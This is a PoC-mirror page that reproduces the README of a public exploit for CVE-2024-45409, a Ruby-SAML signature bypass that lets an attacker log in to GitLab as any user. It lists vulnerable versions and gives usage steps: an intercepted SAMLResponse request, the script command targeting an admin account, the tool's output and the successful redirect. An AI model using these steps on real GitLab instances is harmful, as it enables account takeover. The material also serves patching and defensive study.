支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: eea9123036b91b879134c37c516fde488bead185

来源
https://github.com/synacktiv/CVE-2024-45409
关联漏洞
标题:Ruby SAML 数据伪造问题漏洞 (CVE-2024-45409)
Description:Ruby SAML是SAML-Toolkits开源的一个 SAML 授权客户端的实现。 Ruby SAML存在数据伪造问题漏洞,该漏洞源于Ruby-SAML无法正确验证SAML响应的签名,从而允许攻击者以任意用户身份登录易受攻击的系统。
Description
Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit
介绍
# Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit

This script exploits the [CVE-2024-45409](https://nvd.nist.gov/vuln/detail/CVE-2024-45409) that allows an unauthenticated attacker with access to any signed SAML document issued by the IDP to forge a SAML Response/Assertion and gain access as any user on GitLab. 

All the following GitLab (CE/EE) versions are vulnerable:
* < 16.11.10
* 17.0.0 < 17.0.8
* 17.0.0 < 17.1.8
* 17.0.0 < 17.2.7
* 17.0.0 < 17.3.3

This exploit injects the `DigestValue` of the modified assertion into the `StatusDetail` element, allowing it to smuggle the XPath selector that will use this value instead of the one in the `SignedInfo` block.

## Requirements

* A valid SAML Response issued by the IDP

## Usage

```bash
apt install python3-lxml
```

Intercept the URL and Base64-encoded IDP SAML response first, then modify the XML content using the script.

```http
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
```

```bash
$ python3 CVE-2024-45409.py -r response.url_base64 -n admin@test.local -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64
```

Afterward, replace the parameter `SAMLResponse` value with the script output. If authentication is successful, you will be redirected to the GitLab homepage.
```http
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>
```

## References
* https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
* https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
* https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
* https://nvd.nist.gov/vuln/detail/CVE-2024-45409
* https://www.cvedetails.com/cve/CVE-2024-45409/
文件快照

 [4.0K]  /data/pocs/eea9123036b91b879134c37c516fde488bead185
├── [8.6K]  CVE-2024-45409.py
└── [2.2K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。